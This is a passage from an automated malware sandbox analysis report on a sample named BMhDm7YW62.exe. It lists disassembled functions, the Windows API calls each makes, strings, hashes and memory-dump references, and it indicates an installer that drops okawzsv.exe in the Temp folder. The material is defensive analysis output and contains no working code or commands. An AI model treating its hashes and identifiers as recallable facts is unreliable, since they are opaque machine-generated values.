                                                                                                                        • String ID: %s=%s$@!B$[Rename]
                                                                                                                        • API String ID: 3445103937-2946522640
                                                                                                                        • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                                                                                        • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                                                                                                        • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                                                                                        • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405BBA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                                                                                                        • GetSystemDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00000400), ref: 00405CDD
                                                                                                                        • GetWindowsDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00000400), ref: 00405CF0
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                                                                                                        • SHGetPathFromIDListA.SHELL32(0040F0E0,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ), ref: 00405D3A
                                                                                                                        • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                                                                                                        • lstrcatA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                                                                                                        • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\okawzsv.exe" $Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                        • API String ID: 900638850-908753399
                                                                                                                        • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                                                                                        • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                                                                                                        • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                                                                                        • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405DFA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\BMhDm7YW62.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                                                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\BMhDm7YW62.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                                                                                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                        • String ID: "C:\Users\user\Desktop\BMhDm7YW62.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 589700163-836901544
                                                                                                                        • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                        • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                                                                                                        • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                        • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403EBB Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00403ED8
                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403EF4
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403F00
                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403F0C
                                                                                                                        • GetSysColor.USER32(?), ref: 00403F1F
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403F2F
                                                                                                                        • DeleteObject.GDI32(?), ref: 00403F49
                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403F53
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2320649405-0
                                                                                                                        • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                        • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                                                                                                        • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                        • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004026AF Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000C000,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00402758
                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402771
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3294113728-0
                                                                                                                        • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                                                                                        • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                                                                                                        • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                                                                                        • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404E84 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                        • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                        • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                        • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2531174081-0
                                                                                                                        • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                                                                                        • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                                                                                                        • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                                                                                        • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404753 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476E
                                                                                                                        • GetMessagePos.USER32 ref: 00404776
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404790
                                                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047A2
                                                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                        • String ID: f
                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                        • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                                        • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                                                                                                        • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                                        • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402B6E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                                                                        • MulDiv.KERNEL32(0006365D,00000064,00063661), ref: 00402BB4
                                                                                                                        • wsprintfA.USER32 ref: 00402BC4
                                                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                                                                                                        Strings
                                                                                                                        • verifying installer: %d%%, xrefs: 00402BBE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                        • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                                                                                        • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                                                                                                        • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                                                                                        • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402A69 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1912718029-0
                                                                                                                        • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                                                                                        • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                                                                                                        • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                                                                                        • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1849352358-0
                                                                                                                        • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                                                                                        • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                                                                                                        • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                                                                                        • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404649 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                                                                                        • wsprintfA.USER32 ref: 004046EF
                                                                                                                        • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                        • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                                                                                        • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                                                                                                        • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                                                                                        • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                        • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                                                                                        • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                                                                                                        • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                                                                                        • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

